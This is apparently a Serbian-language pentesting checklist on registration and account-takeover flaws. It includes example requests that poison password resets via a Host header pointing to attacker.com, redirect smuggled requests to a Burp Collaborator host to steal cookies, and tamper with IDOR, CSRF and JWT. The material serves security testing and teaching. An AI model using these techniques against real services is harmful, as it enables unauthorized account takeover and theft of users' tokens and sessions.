Registration & Takeover Vulnerabilities
WhiteIntel je pretraživač pokretan dark-web-om koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici kompromitovani od strane malvera za krađu podataka.
Primarni cilj WhiteIntel-a je borba protiv preuzimanja naloga i napada ransomvera koji proizilaze iz malvera za krađu informacija.
Možete posetiti njihovu veb stranicu i isprobati njihovu mašinu za besplatno na:
Preuzimanje registracije
Duplikat registracije
Pokušajte generisati koristeći već postojeće korisničko ime
Proverite variranje email-a:
velika slova
+1@
dodajte tačku u email
specijalni karakteri u imenu email-a (%00, %09, %20)
Stavite crne karaktere posle email-a:
test@test.com a
victim@gmail.com@attacker.com
victim@attacker.com@gmail.com
Enumeracija korisničkog imena
Proverite da li možete da saznate kada je korisničko ime već registrovano unutar aplikacije.
Politika lozinke
Prilikom kreiranja korisnika proverite politiku lozinke (proverite da li možete koristiti slabe lozinke). U tom slučaju možete pokušati da probate lozinke metodom brute force.
SQL Injection
Proverite ovu stranicu da biste saznali kako pokušati preuzimanje naloga ili izvlačenje informacija putem SQL Injection-a u formama za registraciju.
Oauth preuzimanja
pageOAuth to Account takeoverSAML ranjivosti
pageSAML AttacksPromena email-a
Kada se registrujete pokušajte da promenite email i proverite da li je ova promena ispravno validirana ili možete promeniti na proizvoljne emaile.
Dodatne provere
Proverite da li možete koristiti privremene emaile
Dugačka lozinka (>200) dovodi do DoS-a
Proverite ograničenja brzine pri kreiranju naloga
Koristite username@burp_collab.net i analizirajte callback
Preuzimanje resetovanja lozinke
Curenje tokena za resetovanje lozinke putem referera
Zatražite resetovanje lozinke na vašu email adresu
Kliknite na link za resetovanje lozinke
Ne menjajte lozinku
Kliknite na bilo koje web stranice trećih lica (npr: Facebook, twitter)
Presretnite zahtev u Burp Suite proxy-u
Proverite da li referer zaglavlje otkriva token za resetovanje lozinke.
Trovanje resetovanja lozinke
Presretnite zahtev za resetovanje lozinke u Burp Suite-u
Dodajte ili izmenite sledeće zaglavlja u Burp Suite-u :
Host: attacker.com
,X-Forwarded-Host: attacker.com
Prosledite zahtev sa izmenjenim zaglavljem
http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com
Potražite URL za resetovanje lozinke na osnovu host zaglavlja kao što je :
https://attacker.com/reset-password.php?token=TOKEN
Resetovanje lozinke putem parametra email-a
IDOR na API parametrima
Napadač mora da se prijavi sa svojim nalogom i da ode na opciju Promeni lozinku.
Pokrenite Burp Suite i presretnite zahtev.
Pošaljite ga na karticu za ponavljanje i izmenite parametre: ID korisnika/e-pošta
powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})
Slab token za resetovanje lozinke
Token za resetovanje lozinke treba da bude generisan nasumično i jedinstven svaki put. Pokušajte da utvrdite da li token ističe ili je uvek isti, u nekim slučajevima algoritam generisanja je slab i može biti pogodan. Sledeće promenljive mogu biti korišćene od strane algoritma.
Vremenska oznaka
ID korisnika
E-pošta korisnika
Ime i prezime
Datum rođenja
Kriptografija
Samo brojevi
Mali niz tokena (karakteri između [A-Z,a-z,0-9])
Ponovna upotreba tokena
Datum isteka tokena
Otkrivanje tokena za resetovanje lozinke
Pokrenite zahtev za resetovanje lozinke koristeći API/UI za određenu e-poštu npr: test@mail.com
Inspekcionišite odgovor servera i proverite
resetToken
Zatim koristite token u URL-u kao što je
https://primer.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]
Resetovanje lozinke putem kolizije korisničkog imena
Registrujte se na sistemu sa korisničkim imenom identičnim korisničkom imenu žrtve, ali sa belinama ubačenim pre i/ili posle korisničkog imena. npr:
"admin "
Zatražite resetovanje lozinke sa svojim zlonamernim korisničkim imenom.
Koristite token poslat na vašu e-poštu i resetujte lozinku žrtve.
Povežite se sa nalogom žrtve sa novom lozinkom.
Platforma CTFd je bila ranjiva na ovaj napad. Vidi: CVE-2020-7245
Preuzimanje naloga putem Cross Site Scripting-a
Pronađite XSS unutar aplikacije ili poddomena ako su kolačići ograničeni na nadređeni domen:
*.domain.com
Procureni trenutni kolačići sesije
Autentifikujte se kao korisnik koristeći kolačić
Preuzimanje naloga putem HTTP zahteva Smuggling-a
1. Koristite smuggler da otkrijete tip HTTP zahteva Smuggling (CL, TE, CL.TE)
powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h
2. Kreirajte zahtev koji će prebrisati POST / HTTP/1.1
sa sledećim podacima:
GET http://something.burpcollaborator.net HTTP/1.1 X:
sa ciljem preusmeravanja žrtava na burpcollab i krađe njihovih kolačića
3. Konačan zahtev bi mogao izgledati ovako
Hakerone izveštaji koji iskorišćavaju ovaj bag * https://hackerone.com/reports/737140 * https://hackerone.com/reports/771666
Preuzimanje naloga putem CSRF
Kreirajte payload za CSRF, npr. "HTML obrazac sa automatskim slanjem za promenu lozinke"
Pošaljite payload
Preuzimanje naloga putem JWT
JSON Web Token može se koristiti za autentifikaciju korisnika.
Izmenite JWT sa drugim ID-jem korisnika / Email-om
Proverite da li postoji slab potpis JWT-a
Reference
WhiteIntel je pretraživač pokretan dark-web-om koji nudi besplatne funkcionalnosti za proveru da li je kompanija ili njeni korisnici ugroženi od malvera za krađu podataka.
Primarni cilj WhiteIntela je borba protiv preuzimanja naloga i napada ransomware-a koji proizilaze iz malvera za krađu informacija.
Možete posetiti njihovu veb lokaciju i isprobati njihovu mašinu za besplatno na:
Last updated